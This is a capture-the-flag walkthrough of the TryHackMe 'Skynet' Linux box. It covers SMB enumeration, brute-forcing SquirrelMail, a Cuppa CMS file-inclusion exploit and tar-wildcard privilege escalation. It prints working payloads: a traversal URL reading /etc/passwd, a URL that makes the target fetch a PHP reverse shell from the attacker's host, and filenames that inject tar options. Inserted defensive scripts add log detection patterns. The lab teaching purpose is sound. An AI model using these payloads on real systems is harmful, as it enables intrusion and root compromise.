
TryHackMe – Skynet Walkthrough

Introduction

This was an easy Linux box that involved accessing an open SMB share containing a list of credentials that could be used to brute-force a SquirrelMail web application, finding SMB credentials in an email on that application to access a second share which revealed another web application, and exploiting a remote file inclusion vulnerability in Cuppa CMS to gain remote access. Privilege escalation was possible due to a misconfigured cron job running as root and using a wildcard with the tar command.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

The initial Nmap scan has revealed that ports 22, 80, 110, 139, 143 and 445 are open, so the next logical step is to start enumerating the HTTP and SMB services.

Enumerating SMB

Using the smbclient tool to list the shares available on the host:

Connecting to the “anonymous” share, which contains a text file and a “logs” folder holding three log files. Downloading all of the files locally to further examine them:

The “attention.txt” file contains a note that mentions a password change in the organization, whereas the logs contain what looks like a word list of some sort, potentially from an authentication log:

Enumerating HTTP

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The scan has revealed an interesting “squirrelmail” entry. Upon visiting this page, a login page for the SquirrelMail 1.4.23 web application is displayed. SquirrelMail is a web application that aims to provide both a web-based email client and a proxy server for the IMAP protocol.

Common credentials such as admin/admin were unfortunately unsuccessful.

Brute-forcing SquirrelMail

The word list found earlier could contain a valid password to authenticate into SquirrelMail. Using Burp Suite to intercept the authentication request:

Forwarding the request to Intruder and marking the “secretkey” parameter as the brute-force position, using milesdyson as the username (the user who left the note in the SMB share):

Selecting “runtime file” as the payload type and loading the log file found earlier in the anonymous SMB share:

It appears that for one particular password, the response length differs from that of the failed login requests:

Authenticating into SquirrelMail using the password found by Burp Suite Intruder:

It looks like the site contains three email records, one of which has a subject of “Samba Password reset”:

When opening the email, it appears to contain SMB credentials:

Enumerating SMB Again

The milesdyson user is able to log into the milesdyson share found earlier, using the credentials from the email above:

When listing the contents of the share, there seems to be a “notes” folder, which contains a large number of Markdown files. Downloading the “important.txt” file:

It appears to contain a to-do list, and the first item in the list mentions the “45kra24zxs28v3yd” directory, which points to a content management system:

When accessing the folder, the following page is displayed, indicating the CMS indeed exists:

Exploiting Remote File Inclusion in Cuppa CMS

The next step is to run a scan against this new directory to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Gobuster has revealed the /administrator directory; when accessing it, a Cuppa CMS login page is displayed:

When using the SearchSploit tool to identify known vulnerabilities in Cuppa CMS, it appears to be affected by a local and remote file inclusion vulnerability. This means files hosted on the web server may be readable by external users, and it may be possible to include remote files, potentially resulting in code execution. Mirroring the exploit:

The exploit mentions the following:

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

When using the following payload, the /etc/passwd file that is present on the web server can be accessed:

http://10.10.109.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Copying the Laudanum PHP reverse shell to the current working directory and modifying the IP address and port accordingly:

Setting up a Python web server to host the PHP reverse shell:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Modifying the payload to instead include the PHP reverse shell hosted on the local Kali machine:

http://10.10.109.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.228.20/php-reverse-shell.php

Upon navigating to the PHP reverse shell hosted remotely, the code is executed in the context of the www-data user, therefore granting a reverse shell:
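From the defender's side, the two request shapes used above (a traversal path and a remote URL in a parameter) are easy to spot in web server logs. The following is an added example, not part of the original walkthrough: a small POSIX sh/awk check over constructed Apache-style log lines (hosts and the attacker URL are placeholders; the urlConfig parameter name is the one from the page).

```shell
#!/bin/sh
# Added example (not from the original walkthrough): flag access-log requests
# whose query string carries a path traversal or a remote URL in a parameter,
# the two shapes of the urlConfig abuse described in the walkthrough.
set -eu

# Print lines that look like LFI/RFI attempts. Matches the literal forms
# ("../", "http://") and their percent-encoded spellings (%2e%2e%2f,
# http%3a%2f%2f), case-insensitively, and only inside the query string.
flag_file_inclusion() {
    awk '
    {
        line = $0
        # isolate the query string: from the first "?" up to the next space
        if (match(line, /[?][^ ]*/)) {
            q = tolower(substr(line, RSTART, RLENGTH))
            if (q ~ /(\.\.|%2e%2e)(\/|%2f|\\|%5c)/ ||
                q ~ /=(https?|ftp)(:|%3a)(\/\/|%2f%2f)/) {
                print line
            }
        }
    }'
}

# Count hits, so a scheduled job can act on a number rather than on text.
count_file_inclusion_hits() {
    flag_file_inclusion | wc -l | tr -d ' '
}

# Constructed sample log excerpt (Apache combined format, placeholder hosts).
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:19 +0000] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http%3A%2F%2Fattacker.example%2Fshell.php HTTP/1.1" 200 87
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /squirrelmail/src/webmail.php?right_frame=folders.php HTTP/1.1" 200 300'

# Stand-alone run: print the two suspicious lines from the sample.
printf '%s\n' "$SAMPLE_LOG" | flag_file_inclusion
```

Piping a real access log into flag_file_inclusion works the same way; the benign SquirrelMail request in the sample shows that an ordinary query string is not flagged.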

The following steps can be done to obtain an interactive shell:

  • Running python -c 'import pty; pty.spawn("/bin/sh")' on the victim host
  • Pressing CTRL+Z to background the process and return to our host
  • Running stty raw -echo on our host
  • Typing fg and pressing ENTER to return to the reverse shell

Privilege Escalation

The home directory of the milesdyson user seems to contain a “backup” folder, which holds a Bash script:

It appears the script simply uses the tar command-line tool to archive the contents of the web application stored in /var/www/html and places the backups in the backup folder.

Upon reviewing the cron jobs stored in the /etc/crontab file, it appears this script is executed as root every minute:

Upon consulting GTFOBins, it appears tar can be exploited when running with elevated privileges. Tar has an argument called --checkpoint, which displays a “progress” message every time a given number of files has been archived. This can be used in combination with the --checkpoint-action flag, which executes an action, in the form of a binary or script, whenever a checkpoint is reached.

Since the wildcard used in the script is expanded by the shell into the names of all files and folders in the /var/www/html directory, this can be exploited by creating a file named --checkpoint=1 (to enable the checkpoint function) and a file named --checkpoint-action=exec=/tmp/stef.sh (to specify the action to perform), which tar will effectively treat as arguments when it comes across them. More details on the exploit are available below:

Creating a Bash script, named stef.sh, which will create a SUID copy of bash:

Creating the two files whose names are actually arguments for the tar command-line utility (as used in the GTFOBins example above):

touch "/var/www/html/--checkpoint-action=exec=sh stef.sh"
touch "/var/www/html/--checkpoint=1"

After a minute or so, the cron job has run and has created the “stef” SUID copy of bash. Executing it with the -p flag, which stops bash from dropping the elevated effective user ID it inherits from the SUID owner, grants root access to the host:
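The root cause here is the shell expanding a wildcard into tar's argument list. As an added defensive counterpart (not part of the original walkthrough, and not the box's own backup script), the following POSIX sh snippet shows a wildcard-free way to archive a web root, plus a check that lists option-looking filenames before a scheduled job runs; the paths used are placeholders created for the demonstration.

```shell
#!/bin/sh
# Added example (not part of the original walkthrough): a wildcard-free
# variant of the backup job from the box, plus a check that lists any
# option-looking filenames sitting in the web root before an archive runs.
set -eu

# List direct children of a directory whose names begin with '-'. These are
# the names a shell wildcard would hand to tar as *arguments*, not operands.
find_option_like_names() {
    ls -A -- "$1" | grep '^-' | LC_ALL=C sort
}

# Archive a directory without letting the shell expand a glob: tar receives a
# fixed operand ('.') relative to -C, so a filename can never become a flag,
# and '--' ends option parsing for good measure.
safe_backup() {
    src="$1"; dest="$2"
    tar -C "$src" -cf "$dest" -- .
}

# Count the file entries in an archive, to confirm nothing was dropped.
count_archive_files() {
    tar -tf "$1" | grep -v '/$' | wc -l | tr -d ' '
}

# Constructed demonstration: a scratch web root holding one normal file and
# the two option-looking names from the walkthrough, archived safely.
demo() {
    root="$(mktemp -d)"
    : > "$root/index.html"
    : > "$root/--checkpoint=1"
    : > "$root/--checkpoint-action=exec=sh stef.sh"
    echo "option-like names in $root:"
    find_option_like_names "$root"
    safe_backup "$root" "$root.tar"
    echo "files archived: $(count_archive_files "$root.tar")"
    rm -rf "$root" "$root.tar"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

Running the script with --demo shows both option-looking names being reported and all three files landing in the archive as plain entries; the same find_option_like_names check can run from cron before the real backup as a tripwire.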

Conclusion

This was a very interesting box and, despite the fact that the actual exploitation didn’t require a lot of knowledge, it was very realistic, presenting issues that could very well be found on an actual network, such as open SMB shares containing sensitive information, emails containing credentials and unpatched vulnerable software leading to remote code execution.